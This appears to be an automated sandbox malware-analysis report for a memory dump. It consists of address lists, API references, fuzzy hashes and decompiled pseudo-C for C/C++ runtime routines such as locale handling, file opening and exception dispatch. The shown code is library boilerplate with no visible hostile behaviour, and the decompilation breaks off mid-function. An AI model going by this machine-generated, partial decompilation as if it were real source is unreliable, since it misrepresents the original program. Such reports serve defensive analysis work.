                                                                                      0x00408e99
                                                                                      0x00408ea0
                                                                                      0x00408ea4
                                                                                      0x00408eaa
                                                                                      0x00408ead
                                                                                      0x00408eb0
                                                                                      0x00408eb3
                                                                                      0x00408ebc
                                                                                      0x004090c7
                                                                                      0x004090cf
                                                                                      0x004090dc
                                                                                      0x00408ec2
                                                                                      0x00408ec2
                                                                                      0x00408ec5
                                                                                      0x00000000
                                                                                      0x00408ecb
                                                                                      0x00408ed2
                                                                                      0x00408ed4
                                                                                      0x00408ed7
                                                                                      0x00408eda
                                                                                      0x00408ee1
                                                                                      0x00408ee4
                                                                                      0x00408ee7
                                                                                      0x00408eec
                                                                                      0x00408eec
                                                                                      0x00408ef1
                                                                                      0x00408eff
                                                                                      0x00408ef3
                                                                                      0x00408ef3
                                                                                      0x00408ef8
                                                                                      0x00408efa
                                                                                      0x00408efa
                                                                                      0x00408efa
                                                                                      0x00408ef8
                                                                                      0x00408f06
                                                                                      0x00408f09
                                                                                      0x00408f0e
                                                                                      0x00408f15
                                                                                      0x00408f19
                                                                                      0x00408f20
                                                                                      0x00408f26
                                                                                      0x00408f2d
                                                                                      0x00408f31
                                                                                      0x00408f34
                                                                                      0x00408f38
                                                                                      0x00408f3b
                                                                                      0x00408f3e
                                                                                      0x00408f41
                                                                                      0x00408f44
                                                                                      0x00408f48
                                                                                      0x00408f4a
                                                                                      0x004090e2
                                                                                      0x00000000
                                                                                      0x00408f50
                                                                                      0x00408f55
                                                                                      0x00408f5a
                                                                                      0x00408f61
                                                                                      0x00408f68
                                                                                      0x00408f6f
                                                                                      0x00408f75
                                                                                      0x00408f7e
                                                                                      0x00408f83
                                                                                      0x00408f8a
                                                                                      0x00408f91
                                                                                      0x00408f98
                                                                                      0x00408fa1
                                                                                      0x00408fa6
                                                                                      0x00408fab
                                                                                      0x00408fad
                                                                                      0x00408faf
                                                                                      0x00408fb4
                                                                                      0x00408fb9
                                                                                      0x004090e7
                                                                                      0x004090e7
                                                                                      0x00000000
                                                                                      0x00408fbf
                                                                                      0x00408fbf
                                                                                      0x00408fc1
                                                                                      0x00408fc3
                                                                                      0x00408fc6
                                                                                      0x00408fce
                                                                                      0x00408fd0
                                                                                      0x00408fd5
                                                                                      0x004090ec
                                                                                      0x004090ec
                                                                                      0x00000000
                                                                                      0x00408fdb
                                                                                      0x00408fdb
                                                                                      0x00408fe0
                                                                                      0x00408fe2
                                                                                      0x00408fe8
                                                                                      0x00408fea
                                                                                      0x00408fec
                                                                                      0x00408ff0
                                                                                      0x00408ff8
                                                                                      0x00408ffa
                                                                                      0x00408fff
                                                                                      0x004090f1
                                                                                      0x004090f1
                                                                                      0x004090f6
                                                                                      0x004090f7
                                                                                      0x004090f8
                                                                                      0x004090f9
                                                                                      0x004090fa
                                                                                      0x004090fb
                                                                                      0x004090fc
                                                                                      0x004090fd
                                                                                      0x004090fe
                                                                                      0x004090ff
                                                                                      0x00409100
                                                                                      0x00409102
                                                                                      0x00409104
                                                                                      0x00000000
                                                                                      0x0040910a
                                                                                      0x0040910c
                                                                                      0x00409005
                                                                                      0x00409005
                                                                                      0x0040900a
                                                                                      0x0040900c
                                                                                      0x00409011
                                                                                      0x00409014
                                                                                      0x00409017
                                                                                      0x00409020
                                                                                      0x00409025
                                                                                      0x0040902d
                                                                                      0x00409032
                                                                                      0x00409035
                                                                                      0x0040903a
                                                                                      0x0040903d
                                                                                      0x00409042
                                                                                      0x00409042
                                                                                      0x00409045
                                                                                      0x00409048
                                                                                      0x00409051
                                                                                      0x00409054
                                                                                      0x00409059
                                                                                      0x00409059
                                                                                      0x0040905c
                                                                                      0x0040905f
                                                                                      0x00409068
                                                                                      0x0040906b
                                                                                      0x00409070
                                                                                      0x00409070
                                                                                      0x00409073
                                                                                      0x00409076
                                                                                      0x0040907f
                                                                                      0x00409082
                                                                                      0x00409087
                                                                                      0x00409087
                                                                                      0x0040908a
                                                                                      0x0040908d
                                                                                      0x00409096
                                                                                      0x00409099
                                                                                      0x0040909e
                                                                                      0x0040909e
                                                                                      0x004090a1
                                                                                      0x004090a4
                                                                                      0x004090ad
                                                                                      0x004090b0
                                                                                      0x004090b5
                                                                                      0x004090bb
                                                                                      0x004090c2
                                                                                      0x00000000
                                                                                      0x004090c2
                                                                                      0x00408fff
                                                                                      0x00408fd5
                                                                                      0x00408fb9
                                                                                      0x00408f4a
                                                                                      0x00408ec5

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408F09
                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00408F55
                                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040902D
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004090C2
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 004090E7
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 004090EC
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 004090F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                      • String ID: bad locale name$false$true
                                                                                      • API String ID: 3559308103-1062449267
                                                                                      • Opcode ID: 8e2b496a1ade46c28d766650278afdb73eedd33e2dd970832a66bb988b7a37e3
                                                                                      • Instruction ID: 972b579e4d9e21fa5c226694c29b24cba1ae6b4f551020a53e3f72307f06c12f
                                                                                      • Opcode Fuzzy Hash: 8e2b496a1ade46c28d766650278afdb73eedd33e2dd970832a66bb988b7a37e3
                                                                                      • Instruction Fuzzy Hash: 56716EB0D01344DBEB20DFA5C9457DEBBB4AF14304F14406EE855E7382EBB99A44CB9A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00430BBF), ref: 0042F0B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: DecodePointer
                                                                                      • String ID: 0'@$acos$asin$exp$log$log10$pow$sqrt
                                                                                      • API String ID: 3527080286-2229507274
                                                                                      • Opcode ID: db2c04113a97bc1cb04e4bd5854b1a10a94eac1545050b31a86fc317bb892a2a
                                                                                      • Instruction ID: 243476001b44ac5449d8f3229298061633b823db50f8ef1809aa2f86a7d9650d
                                                                                      • Opcode Fuzzy Hash: db2c04113a97bc1cb04e4bd5854b1a10a94eac1545050b31a86fc317bb892a2a
                                                                                      • Instruction Fuzzy Hash: 79519D75A0412ADBDF148F98F8481BE7BB4FF4A300FD141B6D490A6354CB798929CB6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 38%
                                                                                      			E0042E727(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                      				signed int _v5;
                                                                                      				void* _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				char _v28;
                                                                                      				intOrPtr _v40;
                                                                                      				signed int _v48;
                                                                                      				void _v52;
                                                                                      				char _v76;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t114;
                                                                                      				signed int _t123;
                                                                                      				signed char _t124;
                                                                                      				signed int _t134;
                                                                                      				intOrPtr _t162;
                                                                                      				intOrPtr _t178;
                                                                                      				void* _t188;
                                                                                      				signed int* _t189;
                                                                                      				signed int _t191;
                                                                                      				signed int _t196;
                                                                                      				signed int _t202;
                                                                                      				signed int _t205;
                                                                                      				signed int _t214;
                                                                                      				signed int _t216;
                                                                                      				signed int _t218;
                                                                                      				signed int _t224;
                                                                                      				signed int _t226;
                                                                                      				signed int _t233;
                                                                                      				signed int _t234;
                                                                                      				signed int _t236;
                                                                                      				signed int _t238;
                                                                                      				signed char _t241;
                                                                                      				signed int _t242;
                                                                                      				intOrPtr _t246;
                                                                                      				void* _t249;
                                                                                      				void* _t253;
                                                                                      				void* _t263;
                                                                                      				signed int _t264;
                                                                                      				signed int _t267;
                                                                                      				signed int _t268;
                                                                                      				signed int _t271;
                                                                                      				void* _t273;
                                                                                      				void* _t275;
                                                                                      				void* _t276;
                                                                                      				void* _t278;
                                                                                      				void* _t279;
                                                                                      				void* _t281;
                                                                                      				void* _t285;
                                                                                      
                                                                                      				_t263 = E0042E475(__ecx,  &_v76, _a16, _a20, _a24);
                                                                                      				_t191 = 6;
                                                                                      				memcpy( &_v52, _t263, _t191 << 2);
                                                                                      				_t275 = _t273 + 0x1c;
                                                                                      				_t249 = _t263 + _t191 + _t191;
                                                                                      				_t264 = _t263 | 0xffffffff;
                                                                                      				if(_v40 != _t264) {
                                                                                      					_t114 = E00429762(_t188, _t249, _t264, __eflags);
                                                                                      					_t189 = _a8;
                                                                                      					 *_t189 = _t114;
                                                                                      					__eflags = _t114 - _t264;
                                                                                      					if(_t114 != _t264) {
                                                                                      						_v24 = _v24 & 0x00000000;
                                                                                      						_v28 = 0xc;
                                                                                      						_t276 = _t275 - 0x18;
                                                                                      						 *_a4 = 1;
                                                                                      						_push(6);
                                                                                      						_v20 =  !(_a16 >> 7) & 1;
                                                                                      						_push( &_v28);
                                                                                      						_push(_a12);
                                                                                      						memcpy(_t276,  &_v52, 1 << 2);
                                                                                      						_t196 = 0;
                                                                                      						_t253 = E0042E3E0();
                                                                                      						_t278 = _t276 + 0x2c;
                                                                                      						_v12 = _t253;
                                                                                      						__eflags = _t253 - 0xffffffff;
                                                                                      						if(_t253 != 0xffffffff) {
                                                                                      							L11:
                                                                                      							_t123 = GetFileType(_t253);
                                                                                      							__eflags = _t123;
                                                                                      							if(_t123 != 0) {
                                                                                      								__eflags = _t123 - 2;
                                                                                      								if(_t123 != 2) {
                                                                                      									__eflags = _t123 - 3;
                                                                                      									_t124 = _v52;
                                                                                      									if(_t123 == 3) {
                                                                                      										_t124 = _t124 | 0x00000008;
                                                                                      										__eflags = _t124;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_t124 = _v52 | 0x00000040;
                                                                                      								}
                                                                                      								_v5 = _t124;
                                                                                      								E004296AD(_t196,  *_t189, _t253);
                                                                                      								_t241 = _v5 | 0x00000001;
                                                                                      								_v16 = _t241;
                                                                                      								_v52 = _t241;
                                                                                      								 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
                                                                                      								_t202 =  *_t189;
                                                                                      								_t204 = (_t202 & 0x0000003f) * 0x38;
                                                                                      								__eflags = _a16 & 0x00000002;
                                                                                      								 *((char*)( *((intOrPtr*)(0x444b30 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
                                                                                      								if((_a16 & 0x00000002) == 0) {
                                                                                      									L22:
                                                                                      									_v5 = 0;
                                                                                      									_push( &_v5);
                                                                                      									_push(_a16);
                                                                                      									_t279 = _t278 - 0x18;
                                                                                      									_t205 = 6;
                                                                                      									_push( *_t189);
                                                                                      									memcpy(_t279,  &_v52, _t205 << 2);
                                                                                      									_t134 = E0042E192(_t189,  &_v52 + _t205 + _t205,  &_v52);
                                                                                      									_t242 =  *_t189;
                                                                                      									_t267 = _t134;
                                                                                      									_t281 = _t279 + 0x30;
                                                                                      									__eflags = _t267;
                                                                                      									if(_t267 == 0) {
                                                                                      										 *((char*)( *((intOrPtr*)(0x444b30 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v5;
                                                                                      										 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
                                                                                      										__eflags = _v16 & 0x00000048;
                                                                                      										if((_v16 & 0x00000048) == 0) {
                                                                                      											__eflags = _a16 & 0x00000008;
                                                                                      											if((_a16 & 0x00000008) != 0) {
                                                                                      												_t224 =  *_t189;
                                                                                      												_t226 = (_t224 & 0x0000003f) * 0x38;
                                                                                      												_t162 =  *((intOrPtr*)(0x444b30 + (_t224 >> 6) * 4));
                                                                                      												_t87 = _t162 + _t226 + 0x28;
                                                                                      												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
                                                                                      												__eflags =  *_t87;
                                                                                      											}
                                                                                      										}
                                                                                      										_t268 = _v48;
                                                                                      										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
                                                                                      										if((_t268 & 0xc0000000) != 0xc0000000) {
                                                                                      											L32:
                                                                                      											__eflags = 0;
                                                                                      											return 0;
                                                                                      										} else {
                                                                                      											__eflags = _a16 & 0x00000001;
                                                                                      											if((_a16 & 0x00000001) == 0) {
                                                                                      												goto L32;
                                                                                      											}
                                                                                      											CloseHandle(_v12);
                                                                                      											_v48 = _t268 & 0x7fffffff;
                                                                                      											_t214 = 6;
                                                                                      											_push( &_v28);
                                                                                      											_push(_a12);
                                                                                      											memcpy(_t281 - 0x18,  &_v52, _t214 << 2);
                                                                                      											_t246 = E0042E3E0();
                                                                                      											__eflags = _t246 - 0xffffffff;
                                                                                      											if(_t246 != 0xffffffff) {
                                                                                      												_t216 =  *_t189;
                                                                                      												_t218 = (_t216 & 0x0000003f) * 0x38;
                                                                                      												__eflags = _t218;
                                                                                      												 *((intOrPtr*)( *((intOrPtr*)(0x444b30 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
                                                                                      												goto L32;
                                                                                      											}
                                                                                      											E0041C9F9(GetLastError());
                                                                                      											 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
                                                                                      											E00429875( *_t189);
                                                                                      											L10:
                                                                                      											goto L2;
                                                                                      										}
                                                                                      									}
                                                                                      									_push(_t242);
                                                                                      									goto L21;
                                                                                      								} else {
                                                                                      									_t267 = E0042E5EF(_t204,  *_t189);
                                                                                      									__eflags = _t267;
                                                                                      									if(_t267 == 0) {
                                                                                      										goto L22;
                                                                                      									}
                                                                                      									_push( *_t189);
                                                                                      									L21:
                                                                                      									E00421AC3();
                                                                                      									return _t267;
                                                                                      								}
                                                                                      							}
                                                                                      							_t271 = GetLastError();
                                                                                      							E0041C9F9(_t271);
                                                                                      							 *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x444b30 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
                                                                                      							CloseHandle(_t253);
                                                                                      							__eflags = _t271;
                                                                                      							if(_t271 == 0) {
                                                                                      								 *((intOrPtr*)(E0041CA53())) = 0xd;
                                                                                      							}
                                                                                      							goto L2;
                                                                                      						}
                                                                                      						_t233 = _v48;
                                                                                      						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
                                                                                      						if((_t233 & 0xc0000000) != 0xc0000000) {
                                                                                      							L9:
                                                                                      							_t234 =  *_t189;
                                                                                      							_t236 = (_t234 & 0x0000003f) * 0x38;
                                                                                      							_t178 =  *((intOrPtr*)(0x444b30 + (_t234 >> 6) * 4));
                                                                                      							_t33 = _t178 + _t236 + 0x28;
                                                                                      							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
                                                                                      							__eflags =  *_t33;
                                                                                      							E0041C9F9(GetLastError());
                                                                                      							goto L10;
                                                                                      						}
                                                                                      						__eflags = _a16 & 0x00000001;
                                                                                      						if((_a16 & 0x00000001) == 0) {
                                                                                      							goto L9;
                                                                                      						}
                                                                                      						_t285 = _t278 - 0x18;
                                                                                      						_v48 = _t233 & 0x7fffffff;
                                                                                      						_t238 = 6;
                                                                                      						_push( &_v28);
                                                                                      						_push(_a12);
                                                                                      						memcpy(_t285,  &_v52, _t238 << 2);
                                                                                      						_t196 = 0;
                                                                                      						_t253 = E0042E3E0();
                                                                                      						_t278 = _t285 + 0x2c;
                                                                                      						_v12 = _t253;
                                                                                      						__eflags = _t253 - 0xffffffff;
                                                                                      						if(_t253 != 0xffffffff) {
                                                                                      							goto L11;
                                                                                      						}
                                                                                      						goto L9;
                                                                                      					} else {
                                                                                      						 *(E0041CA40()) =  *_t184 & 0x00000000;
                                                                                      						 *_t189 = _t264;
                                                                                      						 *((intOrPtr*)(E0041CA53())) = 0x18;
                                                                                      						goto L2;
                                                                                      					}
                                                                                      				} else {
                                                                                      					 *(E0041CA40()) =  *_t186 & 0x00000000;
                                                                                      					 *_a8 = _t264;
                                                                                      					L2:
                                                                                      					return  *((intOrPtr*)(E0041CA53()));
                                                                                      				}
                                                                                      			}























































                                                                                      0x0042e74a
                                                                                      0x0042e74e
                                                                                      0x0042e74f
                                                                                      0x0042e74f
                                                                                      0x0042e74f
                                                                                      0x0042e751
                                                                                      0x0042e757
                                                                                      0x0042e772
                                                                                      0x0042e777
                                                                                      0x0042e77a
                                                                                      0x0042e77c
                                                                                      0x0042e77e
                                                                                      0x0042e79d
                                                                                      0x0042e7a4
                                                                                      0x0042e7ab
                                                                                      0x0042e7ae
                                                                                      0x0042e7ba
                                                                                      0x0042e7bd
                                                                                      0x0042e7c5
                                                                                      0x0042e7c6
                                                                                      0x0042e7c9
                                                                                      0x0042e7c9
                                                                                      0x0042e7d0
                                                                                      0x0042e7d2
                                                                                      0x0042e7d5
                                                                                      0x0042e7dd
                                                                                      0x0042e7e0
                                                                                      0x0042e84d
                                                                                      0x0042e84e
                                                                                      0x0042e854
                                                                                      0x0042e856
                                                                                      0x0042e89f
                                                                                      0x0042e8a2
                                                                                      0x0042e8ab
                                                                                      0x0042e8ae
                                                                                      0x0042e8b1
                                                                                      0x0042e8b3
                                                                                      0x0042e8b3
                                                                                      0x0042e8b3
                                                                                      0x0042e8a4
                                                                                      0x0042e8a7
                                                                                      0x0042e8a7
                                                                                      0x0042e8b8
                                                                                      0x0042e8bb
                                                                                      0x0042e8c7
                                                                                      0x0042e8cc
                                                                                      0x0042e8d8
                                                                                      0x0042e8e2
                                                                                      0x0042e8e6
                                                                                      0x0042e8f0
                                                                                      0x0042e8f3
                                                                                      0x0042e8fe
                                                                                      0x0042e903
                                                                                      0x0042e922
                                                                                      0x0042e925
                                                                                      0x0042e929
                                                                                      0x0042e92a
                                                                                      0x0042e930
                                                                                      0x0042e935
                                                                                      0x0042e938
                                                                                      0x0042e93a
                                                                                      0x0042e93c
                                                                                      0x0042e941
                                                                                      0x0042e943
                                                                                      0x0042e945
                                                                                      0x0042e948
                                                                                      0x0042e94a
                                                                                      0x0042e964
                                                                                      0x0042e988
                                                                                      0x0042e98c
                                                                                      0x0042e990
                                                                                      0x0042e992
                                                                                      0x0042e996
                                                                                      0x0042e998
                                                                                      0x0042e9a2
                                                                                      0x0042e9a5
                                                                                      0x0042e9ac
                                                                                      0x0042e9ac
                                                                                      0x0042e9ac
                                                                                      0x0042e9ac
                                                                                      0x0042e996
                                                                                      0x0042e9b1
                                                                                      0x0042e9bd
                                                                                      0x0042e9bf
                                                                                      0x0042ea4a
                                                                                      0x0042ea4a
                                                                                      0x00000000
                                                                                      0x0042e9c5
                                                                                      0x0042e9c5
                                                                                      0x0042e9c9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042e9ce
                                                                                      0x0042e9e0
                                                                                      0x0042e9e8
                                                                                      0x0042e9eb
                                                                                      0x0042e9ec
                                                                                      0x0042e9ef
                                                                                      0x0042e9f6
                                                                                      0x0042e9fb
                                                                                      0x0042e9fe
                                                                                      0x0042ea32
                                                                                      0x0042ea3c
                                                                                      0x0042ea3c
                                                                                      0x0042ea46
                                                                                      0x00000000
                                                                                      0x0042ea46
                                                                                      0x0042ea07
                                                                                      0x0042ea20
                                                                                      0x0042ea27
                                                                                      0x0042e847
                                                                                      0x00000000
                                                                                      0x0042e847
                                                                                      0x0042e9bf
                                                                                      0x0042e94c
                                                                                      0x00000000
                                                                                      0x0042e905
                                                                                      0x0042e90c
                                                                                      0x0042e90f
                                                                                      0x0042e911
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042e913
                                                                                      0x0042e915
                                                                                      0x0042e915
                                                                                      0x00000000
                                                                                      0x0042e91b
                                                                                      0x0042e903
                                                                                      0x0042e85e
                                                                                      0x0042e861
                                                                                      0x0042e87c
                                                                                      0x0042e881
                                                                                      0x0042e887
                                                                                      0x0042e889
                                                                                      0x0042e894
                                                                                      0x0042e894
                                                                                      0x00000000
                                                                                      0x0042e889
                                                                                      0x0042e7e2
                                                                                      0x0042e7e9
                                                                                      0x0042e7eb
                                                                                      0x0042e822
                                                                                      0x0042e822
                                                                                      0x0042e82c
                                                                                      0x0042e82f
                                                                                      0x0042e836
                                                                                      0x0042e836
                                                                                      0x0042e836
                                                                                      0x0042e842
                                                                                      0x00000000
                                                                                      0x0042e842
                                                                                      0x0042e7ed
                                                                                      0x0042e7f1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042e7f3
                                                                                      0x0042e802
                                                                                      0x0042e807
                                                                                      0x0042e80a
                                                                                      0x0042e80b
                                                                                      0x0042e80e
                                                                                      0x0042e80e
                                                                                      0x0042e815
                                                                                      0x0042e817
                                                                                      0x0042e81a
                                                                                      0x0042e81d
                                                                                      0x0042e820
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0042e780
                                                                                      0x0042e785
                                                                                      0x0042e788
                                                                                      0x0042e78f
                                                                                      0x00000000
                                                                                      0x0042e78f
                                                                                      0x0042e759
                                                                                      0x0042e75e
                                                                                      0x0042e764
                                                                                      0x0042e766
                                                                                      0x00000000
                                                                                      0x0042e76b

                                                                                      APIs
                                                                                        • Part of subcall function 0042E3E0: CreateFileW.KERNEL32(?,00000000,?,0042E7D0,?,?,00000000,?,0042E7D0,?,0000000C), ref: 0042E3FD
                                                                                      • GetLastError.KERNEL32 ref: 0042E83B
                                                                                      • __dosmaperr.LIBCMT ref: 0042E842
                                                                                      • GetFileType.KERNEL32(00000000), ref: 0042E84E
                                                                                      • GetLastError.KERNEL32 ref: 0042E858
                                                                                      • __dosmaperr.LIBCMT ref: 0042E861
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0042E881
                                                                                      • CloseHandle.KERNEL32(?), ref: 0042E9CE
                                                                                      • GetLastError.KERNEL32 ref: 0042EA00
                                                                                      • __dosmaperr.LIBCMT ref: 0042EA07
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                      • String ID:
                                                                                      • API String ID: 4237864984-0
                                                                                      • Opcode ID: 06122bed1b9b1595c897591bec152c7780b0d53ef97764a841931a55147a754e
                                                                                      • Instruction ID: 294b2351a34cc03056aee9017c32f9281aa59cbc487eca680c7c36b5e2bcebcc
                                                                                      • Opcode Fuzzy Hash: 06122bed1b9b1595c897591bec152c7780b0d53ef97764a841931a55147a754e
                                                                                      • Instruction Fuzzy Hash: 20A14632A101649FCF19EF69EC91BAE3BA1EF46314F18015EF8119B3D1CB389942CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 72%
                                                                                      			E00416D6A(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                                                      				signed char* _v0;
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				char _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				intOrPtr _v48;
                                                                                      				signed int _v52;
                                                                                      				intOrPtr _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				void _v64;
                                                                                      				signed int _v68;
                                                                                      				char _v84;
                                                                                      				intOrPtr _v88;
                                                                                      				signed int _v92;
                                                                                      				intOrPtr _v100;
                                                                                      				void _v104;
                                                                                      				intOrPtr* _v112;
                                                                                      				signed char* _v184;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				void* _t201;
                                                                                      				signed int _t202;
                                                                                      				char _t203;
                                                                                      				signed int _t205;
                                                                                      				signed int _t207;
                                                                                      				signed char* _t208;
                                                                                      				signed int _t209;
                                                                                      				signed int _t210;
                                                                                      				signed int _t214;
                                                                                      				void* _t217;
                                                                                      				signed char* _t220;
                                                                                      				void* _t222;
                                                                                      				void* _t224;
                                                                                      				signed char _t228;
                                                                                      				signed int _t229;
                                                                                      				void* _t231;
                                                                                      				void* _t234;
                                                                                      				void* _t237;
                                                                                      				signed int _t247;
                                                                                      				void* _t250;
                                                                                      				intOrPtr* _t251;
                                                                                      				signed int _t252;
                                                                                      				intOrPtr _t253;
                                                                                      				signed int _t254;
                                                                                      				void* _t259;
                                                                                      				void* _t264;
                                                                                      				void* _t265;
                                                                                      				signed int _t269;
                                                                                      				signed char* _t270;
                                                                                      				intOrPtr* _t271;
                                                                                      				signed char _t272;
                                                                                      				signed int _t273;
                                                                                      				signed int _t274;
                                                                                      				intOrPtr* _t276;
                                                                                      				signed int _t277;
                                                                                      				signed int _t278;
                                                                                      				signed int _t283;
                                                                                      				signed int _t290;
                                                                                      				signed int _t291;
                                                                                      				signed int _t294;
                                                                                      				signed int _t296;
                                                                                      				signed char* _t297;
                                                                                      				signed int _t298;
                                                                                      				signed char _t299;
                                                                                      				signed int* _t301;
                                                                                      				signed char* _t304;
                                                                                      				signed int _t314;
                                                                                      				signed int _t315;
                                                                                      				signed int _t317;
                                                                                      				signed int _t327;
                                                                                      				void* _t329;
                                                                                      				void* _t331;
                                                                                      				void* _t332;
                                                                                      				void* _t333;
                                                                                      				void* _t334;
                                                                                      
                                                                                      				_t296 = __edx;
                                                                                      				_push(_t315);
                                                                                      				_t301 = _a20;
                                                                                      				_v20 = 0;
                                                                                      				_v28 = 0;
                                                                                      				_t275 = E00417CE0(_a8, _a16, _t301);
                                                                                      				_t332 = _t331 + 0xc;
                                                                                      				_v12 = _t275;
                                                                                      				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                                                                                      					L67:
                                                                                      					_t201 = E0041D1C9(_t270, _t275, _t296, _t301, _t315);
                                                                                      					asm("int3");
                                                                                      					_t329 = _t332;
                                                                                      					_t333 = _t332 - 0x38;
                                                                                      					_push(_t270);
                                                                                      					_t271 = _v112;
                                                                                      					__eflags =  *_t271 - 0x80000003;
                                                                                      					if( *_t271 == 0x80000003) {
                                                                                      						return _t201;
                                                                                      					} else {
                                                                                      						_t202 = E004169EE(_t271, _t275, _t296, _t301, _t315, _t301, _t315);
                                                                                      						__eflags =  *(_t202 + 8);
                                                                                      						if( *(_t202 + 8) != 0) {
                                                                                      							__imp__EncodePointer(0);
                                                                                      							_t315 = _t202;
                                                                                      							_t222 = E004169EE(_t271, _t275, _t296, 0, _t315);
                                                                                      							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                                                                                      							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                                                                                      								__eflags =  *_t271 - 0xe0434f4d;
                                                                                      								if( *_t271 != 0xe0434f4d) {
                                                                                      									__eflags =  *_t271 - 0xe0434352;
                                                                                      									if( *_t271 != 0xe0434352) {
                                                                                      										_t214 = E00414348(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                                                                                      										_t333 = _t333 + 0x1c;
                                                                                      										__eflags = _t214;
                                                                                      										if(_t214 != 0) {
                                                                                      											L84:
                                                                                      											return _t214;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						_t203 = _a16;
                                                                                      						_v28 = _t203;
                                                                                      						_v24 = 0;
                                                                                      						__eflags =  *(_t203 + 0xc);
                                                                                      						if( *(_t203 + 0xc) > 0) {
                                                                                      							_push(_a24);
                                                                                      							E0041427B(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                                                                                      							_t298 = _v40;
                                                                                      							_t334 = _t333 + 0x18;
                                                                                      							_t214 = _v44;
                                                                                      							_v20 = _t214;
                                                                                      							_v12 = _t298;
                                                                                      							__eflags = _t298 - _v32;
                                                                                      							if(_t298 >= _v32) {
                                                                                      								goto L84;
                                                                                      							}
                                                                                      							_t277 = _t298 * 0x14;
